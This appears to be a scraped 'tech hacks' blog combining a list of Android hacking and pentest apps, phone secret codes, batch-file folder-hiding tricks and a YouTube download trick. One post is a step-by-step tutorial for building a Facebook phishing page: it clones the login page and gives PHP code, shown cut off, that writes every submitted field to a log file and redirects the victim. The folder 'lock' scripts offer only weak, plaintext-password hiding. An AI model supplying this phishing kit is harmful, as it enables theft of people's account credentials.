Thursday, October 8, 2015

Best Android Hacking Apps ever

12 Android hacking apps that are meant for hacking, hackers, security researchers ;

Tech Hacks is a app for those who wants only Technology Tricks,Hacks and we provides you some Computer, Mobile, Android, Internet Tricks and Hacks etc. Here you will find Hacking Tricks, and Online Security Tips, New Ways to Utilize Technology Resources and lot more.

#1 Hackode

Hackode : The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

#2 Androrat

Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

#3 APKInspector

APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code.

#4 DroidBox

DroidBox is developed to offer dynamic analysis of Android applications.

#5 Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

#6 zANTI

zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

#7 Droid Sheep

DroidSheep can be easily used by anybody who has an Android device and only the provider of the web service can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the web service.

#8 dSploit

dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.

#9 Arpspoof

Arpspoof is a tool for network auditing originally written by Dug Song as a part of his dsniff package. This app redirects traffic on the local network by forging ARP replies and sending them to either a specific target or all the hosts on the local network paths.

#10 Shark for Root

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.

#11 Nmap for Android

Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good.

#12 SSHDroid


Android Secure Shell: Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting with your remote machine.SSHDroid is a SSH server implementation for Android. This application will let you to connect to your device from a PC and execute commands (like “terminal” and “adb shell”).

Secret Codes for iPhone

Below are the secret codes for iPhone for many utilities-

Secret Hacking Codes for iphone
*#43#
Use to verify if call waiting is enabled
*#61#
Verify the number for unanswered calls
*3282#
Get your data usage information.
*729
Options to make payments. Its operator specific.
*#62#

Verify the number for call forwarding if no service is available.
*#67#
Verify the number for call forwarding if phone is busy
*#33#
To verify whether barring is enabled or disabled for outgoing
*#21#
To display the settings for your call forwarding
*3001#12345#*
Enters Field mode which allows you to access most of the hidden settings and functions of your iPhone.
*#30#
This shows whether you have enabled or disabled the presentation of the calling line, presumably the number of the party placing the call.
*#76#
State whether the connected line presentation is enabled or disabled. Similar to the calling line presentation.
*#06#
Display the IMEI of your iPhone, as always this is the standard code for all brands of phones.
*225#
Displays the account balance for postpaid contracts.
*777#
Displays the account balance for prepaid accounts.
*646#
Displays the remaining minutes available.
611

Sunday, August 25, 2013

How to Lock your PRIVATE FOLDER

1. Make a folder on the desktop and name it as “folder”

2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.

3. In the ‘save as’ name it as lock.bat and click save ! (Save it on Desktop)

4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.


5. In the ‘save as’ name it as key.bat and click save ! (Save it on Desktop)


6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !


7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !


8. Lock your folder and hide the key.bat somewhere else on your hard disk !


9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it ! :)

How to Make Facebook as a Phishing site

Facebook Phishing 




1.Open Facebook and just right click anywhere on the page and select view page source. 

2. copy the source code and paste it in notepad After that just press CTRL+F and find “action=” 

3. And remove the link and just write “action.php” 

4. And save that source code as HTML I am giving the name INDEX.HTML and  Tt's time to make action.php file. 

5.Open your notepad and paste the source code given below and save it as action.php <?php //www.facebook.com header("Location: http://www.facebook.com"); $handle = fopen("logs.html", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fwrite($handle,...

Thursday, April 25, 2013

Download Youtube Videos Without Any Software





This is simple youtube trick which will allow you to download any youtube videos without any software or programme and in many different video formats such as mpeg4, 3gp, hd and many more from within the youtube site.

How To Download Youtube Videos ?

1. First Go to Youtube Homepage.
2. Then select the video you want to download. I will demonstrate with video url given below.
http://www.youtube.com/watch?v=_JAa3NvP6f4
  • Now add save or ss or kick before youtube and press enter.
3. After adding any of the above  keyword the above link will become.
http://www.saveyoutube.com/watch?v=_JAa3NvP6f4Or
http://www.ssyoutube.com/watch?v=_JAa3NvP6f4Or
http://www.kickyoutube.com/watch?v=_JAa3NvP6f4
 4. Now you will be redirected to a new page from where you can download youtube videos in any format of your choice. You may also download only the soundtrack of the video in mp3 format.

Password Protect Any Folder Without Any Software

 
 
 
 
In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCKif NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace coolhacks with  new password in the above code

Wednesday, April 17, 2013

All Mobiles Secret Codes


 


Samsung Secret Codes

Software version: *#9999#IMEI number: *#06#Serial number: *#0001#Battery status- Memory capacity : *#9998*246#
Debug screen: *#9998*324# - *#8999*324#
LCD kontrast: *#9998*523#


LG Secret Codes


LG all models test mode: Type 2945#*# on the main screen.
2945*#01*# Secret menu for LG
IMEI (ALL): *#06#
IMEI and SW (LG 510): *#07#
Software version (LG B1200): *8375#
Recount cheksum (LG B1200): *6861#
Factory test (B1200): #PWR 668
Simlock menu (LG B1200): 1945#*5101#
Simlock menu (LG 510W, 5200): 2945#*5101#
Simlock menu (LG 7020, 7010): 2945#*70001#


Motorola Secret Codes

IMEI number:
*#06#
Code to lock keys. Press together *7
Note: [] (pause) means the * key held in until box appears.
Select phone line - (use this to write things below the provider name):
[] [] [] 0 0 8 [] 1 []
Add phonebook to main menu:
[] [] [] 1 0 5 [] 1 []


Nokia Secret Codes

*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display(operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that supports WLAN.